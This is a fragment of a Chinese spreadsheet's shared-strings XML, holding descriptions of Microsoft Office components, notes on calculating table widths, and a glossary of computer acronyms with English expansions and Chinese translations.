    <t>　　Microsoft Word是文字处理软件。它被认为是Office的主要程序。它在文字处理软件市场上拥有统治份额。它私有的DOC格式被尊为一个行业的标准，虽然它的最新版本Word 12.0/2007也支持一个基于XML的格式。Word也适宜某些版本的Microsoft Works。它适宜Windows和Macintosh 平台。它的主要竞争者是OpenOffice.org Writer、StarOffice、Corel WordPerfect和Apple Pages。Microsoft Word可以轻松构造各种网页，实现其他软件难以实现的网页效果，缺陷是它构造的WEB网页CSS代码繁多。</t>
  </si>
  <si>
    <t>Excel</t>
  </si>
  <si>
    <t>　　Microsoft Excel是电子数据表程序〔进行数字和预算运算的软件程序〕。像Microsoft Word，它在市场拥有统治份额。它最初对占优势的Lotus 1-2-3是个竞争者，但最后它卖得比它多、快，于是它成为了实际标准。它适宜Windows和Macintosh 平台。它的主要竞争者是OpenOffice.org Calc、StarOffice和Corel Quattro Pro。</t>
  </si>
  <si>
    <t>Outlook</t>
  </si>
  <si>
    <t>　　Microsoft Outlook——请不要同微软的另外一款产品Outlook Express相混淆—— 是个人信息管理程序和电子邮件通信软件。在Office 97版接任Microsoft Mail。它包括一个电子邮件客户端，日历，任务管理者，和地址本。它的电子邮件程序的主要竞争者是Mozilla Thunderbird（Mozilla）和Eudora。它的个人信息管理程序主要竞争者是Mozilla和Lotus Organizer。它仅适宜Windows平台；一个版本也被包括在大多数Pocket PC掌上电脑里。它在Macintosh里对应的程序是Microsoft Entourage。</t>
  </si>
  <si>
    <t>Access</t>
  </si>
  <si>
    <t>　　Microsoft Office Access（前名 Microsoft Access）是由微软发布的关联式数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点，是 Microsoft Office 2007 的成员之一。</t>
  </si>
  <si>
    <t>　　Access能够存取 Access/Jet、Microsoft SQL Server、Oracle，或者任何 ODBC 兼容数据库内的资料。熟练的软件设计师和资料分析师利用它来开发应用软件，而一些不熟练的程序员和非程序员的"进阶用户"则能使用它来开发简单的应用软件。虽然它支援部份面向对象（OO）技术，但是未能成为一种完整的面向对象开发工具。</t>
  </si>
  <si>
    <t>　　其实Access 也是微软公司另一个通讯程序的名字，想与 ProComm 以及其他类似程序来竞争。可是事后微软证实这是个失败计划，并且将它中止。数年后他们把名字重新命名于数据库软件。</t>
  </si>
  <si>
    <t>PowerPoint</t>
  </si>
  <si>
    <t>　　Microsoft PowerPoint 使用户可以快速创建极具感染力的动态演示文稿，同时集成工作流和方法以轻松共享信息。</t>
  </si>
  <si>
    <t>Outlook Express</t>
  </si>
  <si>
    <t>Project</t>
  </si>
  <si>
    <t>　　Microsoft Project(或MSP) 是专案管理软件程序由微软开发销售。软件设计目的在于协助专案经理发展计划、为任务分配资源、跟踪进度、管理预算和分析工作量。第一版微软Project为微软Project for Windows 95，发布于1995年。其后版本各于1998, 2000, 2003和2006年发布。本应用程序可产生关键路径日程表──虽然第三方ProChain和Spherical Angle也有提供关键链关联软件。日程表可以以资源标准的，而且关键链以甘特图形象化。另外，Project可以辨认不同类别的用户。这些不同类的用户对专案、概观、和其它资料有不同的访问级别。自订物件如行事历、观看方式、表格、筛选器和字段在企业领域分享给所有用户。</t>
  </si>
  <si>
    <t>Publisher</t>
  </si>
  <si>
    <t>　　Microsoft Office Publisher是微软公司发行的桌面出版应用软件。它常被人们认为是一款入门级的桌面出版应用软件，它能提供比Microsoft Word更强大的页面元素控制功能，但比起专业的页面布局软件，比如说Adobe公司的InDesign以及Quark公司的QuarkXPress来还略逊一筹。</t>
  </si>
  <si>
    <t>　　比起其它桌面出版软件来，Publisher在历史上一直不受高端商务打印商店欢迎。它只能用于Windows，而业界占相当份额的系统运行的是苹果公司的Mac OS X。Publisher定位于入门级的应用软件造成了很多的问题，比如在服务提供商的电脑上没有相应字体和嵌入对象等等（虽然Publisher提供了可以把相关联的文件压缩成一个自释放应用程序的工具）。许多高端特性，比如透明化，对象阴影，slugs，路径文本，内嵌的PDF输出等等，或者没有完全实现，或者干脆没有。但最近的一些版本有了很大的提高，开始关注色彩分离以及正确地处理彩色输出。Publisher 2007还包含了期待已久的特性，可以输出商业出版品质带内嵌字体的PDF格式，作为选件可以从微软网站下载。</t>
  </si>
  <si>
    <t>　　Publisher被包含在高端的Microsoft Office版本中。这反映了微软对Publisher的定位，它是一款易用的，相比于那些重量级产口而言价格适中的产品，它的目标用户主要是那些没有专业人员制作市场推广材料以及其它文档的中小型企业。</t>
  </si>
  <si>
    <t>　　Publisher的大部份替代品，除Adobe PageMaker外，都不提供导入Publisher的功能；但是，Publisher可以导出成EMF (Enhanced Metafile)格式，它可以被其它软件支持。</t>
  </si>
  <si>
    <t>Visio</t>
  </si>
  <si>
    <t>　　Microsoft Visio是Windows操作系统下运行的流程图和矢量绘图软件，它是Microsoft Office软件的一个部分。</t>
  </si>
  <si>
    <t>　　2000年微软公司收购同名公司后，Visio成为微软公司的产品。它的竞争者是Adobe Illustrator、Macromedia FreeHand和CorelDraw。</t>
  </si>
  <si>
    <t>OneNote</t>
  </si>
  <si>
    <t>SharePoint Designer 2007</t>
  </si>
  <si>
    <t>　　Microsoft SharePoint Designer 2007是Frontpage 2003的下一个版本，不过这个版本绝对不是Frontpage 2003的简单改进版，Microsoft Office SharePoint Designer 2007 是一种全新的Web2.0产品，用于基于 SharePoint 技术创建和自定义 Microsoft SharePoint 网站并生成启用工作流的应用程序。Office SharePoint Designer 2007 提供了多种专业工具，利用这些工具，用户在 SharePoint 平台上无需编写代码即可生成交互解决方案、设计自定义 SharePoint 网站以及使用报告和托管权限维护网站性能。</t>
  </si>
  <si>
    <t>Infopath</t>
  </si>
  <si>
    <t>　　Microsoft Infopath是用来开发XML为本用户表格的应用程序。于2003年末首先发布为微软Office 2003套餐程序的一部分。InfoPath主要特点是它对自订的XML概要支援，以创作和查验XML文件的能力。它可透过MSXML与SOAP工具包利用XML Web Services连接到外部系统 ，并且后端和中间层系统可设定来利用Web Services标准如SOAP, UDDI, 以及WSDL来沟通。另外，因为InfoPath文件是基于XML的，它可从外部数据库资源调用资料绑定到表格控制元件而非InfoPath本身 。</t>
  </si>
  <si>
    <t>　　这里有一个例子可以说明InfoPath可以用来做什么：用户在他们的笔记本上使用InfoPath离线填写一张表单。InfoPath可以检查这张表单里一些字段的合法性，用户可以附加一个数字签名。然后用户可以连接到服务器，提交表单（以XML形式），等待上级的批准。当用户连接到服务器时，表单模板可以被自动更新。</t>
  </si>
  <si>
    <t>Communicator 2005</t>
  </si>
  <si>
    <t>　　Communicator 2005 是一种集成的通讯客户端，支持信息工作者实时通讯。作为 Microsoft Office Live Communications Server 2005 的推荐客户端，Communicator 2005 集成了 Microsoft Office System 应用程序和企业电话基础结构。</t>
  </si>
  <si>
    <t>Groove</t>
  </si>
  <si>
    <t>　　Microsoft Groove的工作原理就是基于P2P来实现协作，其方法就是在项目内各个团队成员的计算机上创建一个完全同步的区域，在这个区域内所有的讨论、文件、事件、表格、日历将完全自动与项目其他成员同步，而且还提供了仿似即时通讯的功能，Groove还可扩展提供到后台sps的链接，适应性极强。</t>
  </si>
  <si>
    <t>　　其他组件和网络服务：除了以上常用的几种组件，Microsoft Office还有以下其他组件和网络服务。</t>
  </si>
  <si>
    <t>　　Microsoft Binder——把多个文件合并为一个文件。</t>
  </si>
  <si>
    <t>　　Binder对微软来说是一个大范围的失败，并且被应用得非常不广泛。因此Office的新版本经常不包括它。</t>
  </si>
  <si>
    <t>　　Microsoft Entourage——仅用于Macintosh的个人信息管理程序和通信软件。（与Outlook类似) 。</t>
  </si>
  <si>
    <t>　　Microsoft MapPoint是微软经年打造、允许用户观看、编辑和集成地图的技术和软件的一个独特作品。</t>
  </si>
  <si>
    <t>　　MapPoint 意欲为商业用户，因为它包括先进的功能，譬如与微软Office整合，并且从微软Excel在一张被创造的地图上显示趋向和资料。</t>
  </si>
  <si>
    <t>　　MapPoint技术用在：</t>
  </si>
  <si>
    <t>　　终端用户软件：</t>
  </si>
  <si>
    <t>　　MapPoint (为北美和西欧商业用户)</t>
  </si>
  <si>
    <t>　　AutoRoute (为西欧家庭和商业用户)</t>
  </si>
  <si>
    <t>　　微软Streets and Trips (为北美一般家庭用户)</t>
  </si>
  <si>
    <t>　　Encarta百科全书</t>
  </si>
  <si>
    <t>　　网络为基础的服务：</t>
  </si>
  <si>
    <t>　　MapPoint Web服务</t>
  </si>
  <si>
    <t>　　微软地图网站mappoint.msn.com</t>
  </si>
  <si>
    <t>　　MSN为本的Virtual Earth虚拟地球仪服务</t>
  </si>
  <si>
    <t>　　微软MapPoint每年更新。最新版本为MapPoint 2006。该软件支援三个平台：Pocket PC, SmartPhone, Windows。</t>
  </si>
  <si>
    <t>　　Microsoft Office旧组件：</t>
  </si>
  <si>
    <t>　　Microsoft Photo Editor——在更旧的版本和XP版的Office中的相片编辑／纲板图形软件。它由Microsoft PhotoDraw暂时地补充在了Office 2000 Premium版中。</t>
  </si>
  <si>
    <t>　　Microsoft Mail——邮件客户端（包含在Office的老版本中，后来由Microsoft Outlook替代）。</t>
  </si>
  <si>
    <t>　　Microsoft Office Picture Manager是一个基本的图片管理软件，是Microsoft Office 2003中的一个组件（与一个基本版的Google的Picasa或Adobe的Photoshop Elements相似）。</t>
  </si>
  <si>
    <t>Microsoft office</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Return to contents</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>每一代的</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft office</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>都有一个以上的版本，每个版本都根据使用者的实际需要，选择了不同的组件。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft Outlook Express</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>，简称为OE，是微软公司出品的一款电子邮件客户端，也是一个基于NNTP协议的Usenet客户端。微软将这个软件与操作系统以及Internet Explorer网页浏览器捆绑在一起。同时，对于</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>苹果公司</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>“经典”版的麦金塔电脑提供该软件的免费下载(微软不对新版本的Mac OS X操作系统提供该软件，在OS X上微软对应的软件是Microsoft Entourage，Microsoft Entourage是专有商用软件Microsoft Office套装的一部分)。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft OneNote</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>使您能够捕获、组织和重用便携式计算机、台式计算机或 Tablet PC 上的便笺。它为您提供了一个存储所有便笺的位置，并允许您自由处理这些便笺。OneNote 2003 还帮助您以多种方式捕获信息，然后根据需要组织和使用它。 它是</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF3366CC"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Office 2003</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>中的新程序。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft Binder</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft Entourage</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft MapPoint</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Live Communication Server</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>——实时通信软件。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Developer Tools</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>——开发工具（只包含于开发版）</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft Office Online</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>——网站。包含在Microsoft Office 2007的所有版本。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft Office Update</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>——网站。Office2000、XP、2003和2007版的补丁查找和安装服务。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Office助手</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>是微软Office从Office97开始具有的特性。这个特性是提供不同的搜索功能的程序帮助系统的入口，这个系统在Office97-2002(Windows版本)和98-2004(Macintosh)版本是基于贝叶斯算法的。Office助手最初是由滑铁卢大学的计算机科学实习生设计和发展的。</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft Photo Editor</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft Mail</t>
    </r>
  </si>
  <si>
    <r>
      <t>　　</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Microsoft Office Picture Manager</t>
    </r>
  </si>
  <si>
    <t>Windows Live 软件包</t>
  </si>
  <si>
    <t>Windows Live 软件包</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>边框值改变的是表格四边的值(上下左右端)，其内部单元格的边框始终是2个像素（当单位是像素时），</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>备注：</t>
  </si>
  <si>
    <t>表格内全部单元格宽度合计</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>合计</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>列数*2</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>内部</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>边框*2(端)</t>
  </si>
  <si>
    <t>两端</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>边框</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>(列数+1)*间距</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>间距</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>列数*2*填充</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>填充</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>宽度值</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>计算公式</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>各填充、间距、边框的宽度</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>变量值</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>表格宽度</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>表格列数</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>(当表格存在填充、间距、边框时，)</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>表格内全部单元格宽度合计值的计算</t>
    <phoneticPr fontId="8" type="noConversion"/>
  </si>
  <si>
    <t>WD table cell</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>英文缩写</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>英文全称</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中文</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>备注1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>备注2</t>
  </si>
  <si>
    <t>3DS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Three Dimension Studio   </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>三维摄影室</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ACPI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Advanced Configuration and Power Interface</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>高级配置与电源接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ACR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Advanced communication Riser</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>先进通信子卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ADSL</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Asymetrical Digital Subscriber Line</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>非对称数字用户线路</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AGP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Accelerated Graphics Port</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>图形加速器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AMR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Audio/Modem Riser</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>声音/调制解调器插卡</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Access Point</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无线访问点</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>APM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Advanced Power Management</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ARP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Address resolution Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>地址解析协议</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ASCII</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>American Standard Code of Information Interchange</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ASF</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Advanced Streaming Format</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>高级流媒体格式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ASP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Active Server Page</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Application Service Protocol</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ATM</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Asynchronous Time-division Multiplexing</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>异步时分多路复用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AVI</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Audio Video Interleaved</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>音频祎视频交错格式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>interleaved</t>
  </si>
  <si>
    <t>[计]交叉存取</t>
  </si>
  <si>
    <t>B2B</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Business to Business</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>企业对企业的电子商务模式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>B2C</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Business to Consumer</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>企业对个人的电子商务模式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BASIC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Beginner's All-Purpose Sysmbonic Instruction</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>初学者通用指令代码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BBS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">Bulletin Boards System   </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>公告板，电子布告栏系统</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BCD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Boot configuration Data</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BGA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ball Grid Array</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>球栅阵列封装（内存封装类型）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BPS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Byte per second</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据传输数率：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bit Torrent</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CAD</t>
  </si>
  <si>
    <t xml:space="preserve">Computer-aided Design   </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>计算机辅助设计</t>
  </si>
  <si>
    <t>CAI</t>
  </si>
  <si>
    <t>Computer-assisted Instruction</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>计算机辅助教学</t>
  </si>
  <si>
    <t>或Computer-aided</t>
  </si>
  <si>
    <t>Instruction</t>
  </si>
  <si>
    <t>CCD</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Charge-Couple Device</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电子耦合设备</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>利用微电子技术制成的表面光电器件，可实现光电转换</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD</t>
  </si>
  <si>
    <t xml:space="preserve">Compact Disc  </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光盘</t>
  </si>
  <si>
    <t>CDMA</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Code Division Multiple Address</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD-R</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Compact Disc-Recordable</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> 可录式光盘片</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD-ROM</t>
  </si>
  <si>
    <t>Compact Disc Read-Only-M emory</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>只读光盘</t>
  </si>
  <si>
    <t>CD-RW</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Compact Disc-ReWritable</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可擦写式光盘片</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CINIC</t>
  </si>
  <si>
    <t>ChinaInternet Network Information Center</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>中国互联网络信息中心</t>
  </si>
  <si>
    <t>CMM</t>
  </si>
  <si>
    <t xml:space="preserve">Capability Maturity Model </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件能力成熟度模型</t>
  </si>
  <si>
    <t>CMOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Complementary Metal Oxide Semiconductor</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>互补金属氧化物半导体存贮器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CNC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Computer Numerial control</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CNR</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Communication and Networking Riser</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Central Process Unit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CRT</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cathode Ray Tube</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>阴极射线管处理器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CSS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cascading Style Sheet</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>层叠\级联\串接样式单</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CTI</t>
  </si>
  <si>
    <t xml:space="preserve">Computer Telephony Integration </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>计算机电话集成</t>
  </si>
  <si>
    <t>DAB</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Digital Audio Broadcasting</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数字音频广播</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DAC</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Digital Analog Converter</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
